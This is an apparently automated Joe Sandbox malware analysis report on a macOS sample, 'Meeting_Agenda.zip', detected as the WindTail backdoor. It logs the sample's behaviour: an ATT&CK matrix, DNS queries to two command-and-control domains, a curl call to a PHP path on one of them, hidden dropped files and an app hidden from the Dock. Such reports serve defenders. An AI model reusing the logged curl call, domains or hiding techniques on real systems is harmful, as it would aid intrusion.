Loading ...

Analysis Report Meeting_Agenda.zip

Overview

General Information

Joe Sandbox Version:25.0.0
Analysis ID:66291
Start date:24.12.2018
Start time:09:33:49
Joe Sandbox Product:Cloud
Overall analysis duration:0h 6m 0s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Meeting_Agenda.zip
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection:MAL
Classification:mal60.troj.evad.macZIP@0/11@5/0

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold600 - 100Report FP / FNfalsemalicious

Classification

Analysis Advice

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsScripting1Hidden Files and Directories21Port MonitorsHidden Files and Directories21Credential DumpingSystem Information Discovery11Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol1
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesScripting1Network SniffingApplication Window DiscoveryRemote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote Access Tools1
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionCode Signing2Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol11

Signature Overview

Click to jump to signature section


Networking:

barindex
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.55.204
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.55.204
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)Show sources
Source: unknownDNS traffic detected: query: flux2key.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: string2me.com replaycode: Server failure (2)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: flux2key.com

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.evad.macZIP@0/11@5/0

Persistence and Installation Behavior:

barindex
Writes Mach-O files to untypical directoriesShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)64-bit Mach-O written to unusual path: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnodeJump to dropped file
Changes permissions of written Mach-O filesShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Permissions modified for written 64-bit Mach-O /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode: bits: - usr: rx grp: rx all: rwxJump to dropped file
Creates hidden files, links and/or directoriesShow sources
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Hidden file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/.dat.nosync0219.V8cWwQJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Shell command executed: /bin/sh -c open -a /Users/henry/Library/Meeting_Agenda.appJump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Curl executable: /usr/bin/curl -> /usr/bin/curl string2me.com/qgHUDRZiYhOqQiN/kESklNvxsNZQcPl.phpJump to behavior
Opens applications that may be created onesShow sources
Source: /bin/sh (PID: 536)Application opened: open -a /Users/henry/Library/Meeting_Agenda.appJump to behavior
Reads launchservices plist filesShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 536)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)File written: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnodeJump to dropped file
Writes RTF files to diskShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)File written: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/Credits.rtfJump to dropped file
Writes icon files to diskShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)File written: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/WXBN.icnsJump to dropped file
App bundle is code signedShow sources
Source: Submitted file: Meeting_Agenda.zipCodeResources XML file: CodeResources
Source: Submitted file: Meeting_Agenda.zipCodeResources XML file: CodeResources
Submitted sample is a bundle that is signedShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)CodeSignature CodeResources file read: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)CodeSignature CodeResources file read: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/_CodeSignature/CodeResourcesJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)XML plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/_CodeSignature/CodeResourcesJump to dropped file
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)XML plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plistJump to dropped file
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)Binary plist file created: /Users/henry/Library/Meeting_Agenda.app/Contents/Resources/en.lproj/MainMenu.nibJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to launch an application with a docker icon (i.e. hidden to the user)Show sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)XML plist file created with NSUIElement = 1: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plistJump to dropped file
Contains functionality to register custom URL schemes (potentially used for hidden execution via browsers)Show sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)XML plist file created with CFBundleURLSchemes: /Users/henry/Library/Meeting_Agenda.app/Contents/Info.plistJump to dropped file

Language, Device and Operating System Detection:

barindex
Reads the systems hostnameShow sources
Source: /bin/sh (PID: 536)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/open (PID: 536)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 537)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Remote Access Functionality:

barindex
Detected macOS WindTailShow sources
Source: /Users/henry/Desktop/unpack/Meeting_Agenda.app/Contents/MacOS/usrnode (PID: 535)IOC file dropped: /Users/henry/Library/Meeting_Agenda.app/Contents/MacOS/usrnodeJump to dropped file


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 66291 Sample: Meeting_Agenda.zip Startdate: 24/12/2018 Architecture: MAC Score: 60 20 17.253.55.204, 49236, 80 APPLE-AUSTIN-AppleIncUS United States 2->20 22 string2me.com 2->22 24 flux2key.com 2->24 6 xpcproxy usrnode 2->6         started        10 xpcproxy usrnode 1 2->10         started        process3 file4 16 /Users/henry/Libra...tents/MacOS/usrnode, Mach-O 6->16 dropped 18 /Users/henry/Libra...Contents/Info.plist, XML 6->18 dropped 26 Detected macOS WindTail 6->26 28 Contains functionality to launch an application with a docker icon (i.e. hidden to the user) 6->28 30 Contains functionality to register custom URL schemes (potentially used for hidden execution via browsers) 6->30 32 Writes Mach-O files to untypical directories 6->32 12 sh open 6->12         started        14 curl 10->14         started        signatures5 process6

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.